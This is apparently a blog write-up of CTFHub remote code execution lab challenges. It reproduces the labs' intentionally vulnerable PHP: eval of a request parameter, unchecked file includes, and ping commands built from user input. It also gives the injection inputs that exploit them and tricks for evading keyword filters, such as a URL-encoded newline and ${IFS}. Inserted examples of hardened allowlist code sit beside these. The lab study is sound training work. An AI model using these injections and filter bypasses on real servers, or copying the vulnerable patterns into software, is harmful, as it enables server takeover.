CTFHub-rce
2022-06-25 04:55:00 【Cn Sirius】
rce: Remote Code Execution vulnerability
Divided into remote command execution (the ping challenges) and remote code execution (the eval challenges).
It is essentially an interface that lets an attacker inject operating system commands or code directly into the backend server and so take control of it; that is the RCE vulnerability. It amounts to directly controlling the server's command line. A high-risk vulnerability!
eval execution
<?php
if(isset($_REQUEST['cmd'])){
eval($_REQUEST['cmd']);
}
else{
highlight_file(__FILE__);
}
?>
Pass the parameter cmd to eval:
/?cmd=system("ls /"); // there is no flag in the root directory here, so look at the next directory level
After finding it, cat /flag_****
File inclusion
The strpos function is used here.
strpos: finds the position of the first occurrence of a substring
int strpos ( string $haystack , mixed $needle [, int $offset = 0 ] )
Used in the challenge:
if(!strpos($_GET["file"],"flag")){
// only runs when the "flag" characters are not found
include $_GET["file"];
}
to include a file, and the shell.txt below contains an eval vulnerability.
So include it (shell.txt contains no "flag" characters, so the strpos check has no effect here).
Via GET (include the file) and POST (pass the parameter), get the flag.
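As an added illustration (not code from the challenge or the write-up), the strpos() denylist above placed beside an allowlist-based include; the base directory and page names are assumed:

```php
<?php
// Added example: denylist check from the challenge vs. an allowlist include.
declare(strict_types=1);

// The challenge's check. It relies on the truthiness of strpos(), which
// returns an int offset or false; the PHP manual warns that a needle at
// offset 0 yields 0, so a strict !== false comparison is the safer form.
function denylist_allows(string $file): bool {
    return !strpos($file, "flag");
}

// Hardened check: only fixed page names, resolved under a fixed directory,
// are ever handed to include. Both constants are assumed values.
const INCLUDE_BASE    = '/var/www/pages';
const INCLUDE_ALLOWED = ['home', 'about', 'help'];

function resolve_include(string $page): ?string {
    if (!in_array($page, INCLUDE_ALLOWED, true)) {
        return null;                                   // not on the allowlist
    }
    // realpath() resolves symlinks and ".." and returns false if the file
    // does not exist, so the result is checked against the base directory.
    $path = realpath(INCLUDE_BASE . '/' . $page . '.php');
    if ($path === false || strpos($path, INCLUDE_BASE . '/') !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: the write-up's shell.txt, a stream wrapper, an
// allowlisted page name and a traversal attempt.
foreach (['shell.txt', 'php://input', 'about', '../etc/passwd'] as $in) {
    $resolved = resolve_include($in);
    printf("%-16s denylist:%-5s allowlist:%s\n", $in,
        denylist_allows($in) ? 'allow' : 'deny',
        $resolved === null ? 'deny' : 'allow -> ' . $resolved);
}
```

With the allowlist, "about" is only accepted when /var/www/pages/about.php actually exists; everything else is refused before include() is reached.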
phpinfo
<?php
if (isset($_GET['file'])){
if ( substr($_GET["file"], 0, 6) === "php://" ) {
include($_GET["file"]);
}
else {
echo "Hacker!!!";
}
}
else {
highlight_file(__FILE__);
}
?>
<hr>i don't have shell, how to get flag? <br><a href="phpinfo.php">phpinfo</a>
Click the phpinfo link to see the PHP environment.
php://input
php:// — access various input/output streams (I/O streams)
PHP provides a number of miscellaneous input/output (IO) streams that allow access to PHP's own I/O streams, the standard input, output and error descriptors, in-memory and disk-backed temporary file streams, and filters that can operate on other readable/writable file resources.
php://input is a read-only stream that gives access to the raw request data.

Read source code
Looking at the environment, php://input cannot be used.
<?php
error_reporting(E_ALL);
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 6) === "php://" ) {
include($_GET["file"]);
} else {
echo "Hacker!!!";
}
} else {
highlight_file(__FILE__);
}
?>
But the parameter must still start with php://
php://filter


Remote inclusion
Same as the phpinfo challenge; do the same thing.
Command injection
Enter the command:
127.0.0.1;ls
Then there was a problem with cat: the output is limited.
So the pipe symbol is used to base64-encode the output.
Get it and decode it.

Filter cat
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/cat/", $ip, $m)) {
// cat is filtered out
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
}
else {
$res = $m;
}
}
?>
<pre>
<?php
if ($res) {
print_r($res);
}
?>
</pre>
<?php
show_source(__FILE__);
?>
</body>
</html>
more
The Linux more command is similar to cat, but it displays the file page by page, which is more convenient for reading. The most basic usage: press the space bar to show the next page, press the b key to go back (back) one page; it can also search for strings (similar to vi). While viewing a document, press h for help.
more [-dlfpcsu] [-num] [+/pattern] [+linenum] [fileNames..]

Filter space
In Linux, a space can be replaced with < or ${IFS}.

Filter operators
Instead of cat [file]|base64 you can also use base64 [file].
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/(\||\&)/", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>

Comprehensive practice
!preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip
; can be replaced with %0a (URL-encoded newline), cat with base64, flag with wildcards such as f*** or *lag, and space with ${IFS}.
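As an added illustration (not code from the challenge or the write-up), the denylist approach used across the ping challenges placed beside allowlist validation of the address plus argument quoting; the function names are assumed:

```php
<?php
// Added example: token denylist from the challenge vs. validating the input
// as an IP address before any command string is built.
declare(strict_types=1);

// Challenge-style check: rejects the input only if a denied token matches.
function denylist_allows(string $ip): bool {
    return !preg_match_all("/(\||&|;| |\/|cat|flag|ctfhub)/", $ip);
}

// Hardened check: the only thing ever accepted is a syntactically valid
// IPv4 or IPv6 address; anything else is refused up front.
function validate_ip(string $ip): ?string {
    $v = filter_var($ip, FILTER_VALIDATE_IP);
    return $v === false ? null : $v;
}

// Build the command only from the validated value, and still quote it so
// the shell sees exactly one argument.
function build_ping_command(string $ip): ?string {
    $v = validate_ip($ip);
    if ($v === null) {
        return null;
    }
    return 'ping -c 4 ' . escapeshellarg($v);
}

// Constructed inputs: two legitimate addresses plus the shapes the
// write-up above describes (newline instead of ';', ${IFS} for a space).
$inputs = ['127.0.0.1', '::1', "127.0.0.1;ls", "127.0.0.1\nls", '127.0.0.1${IFS}ls'];
foreach ($inputs as $in) {
    printf("%-24s denylist:%-5s validated:%s\n", json_encode($in),
        denylist_allows($in) ? 'allow' : 'deny',
        build_ping_command($in) ?? 'deny');
}
```

Only the two plain addresses ever reach the command builder; the denylist, by contrast, lets the newline and ${IFS} variants through because neither contains a listed token.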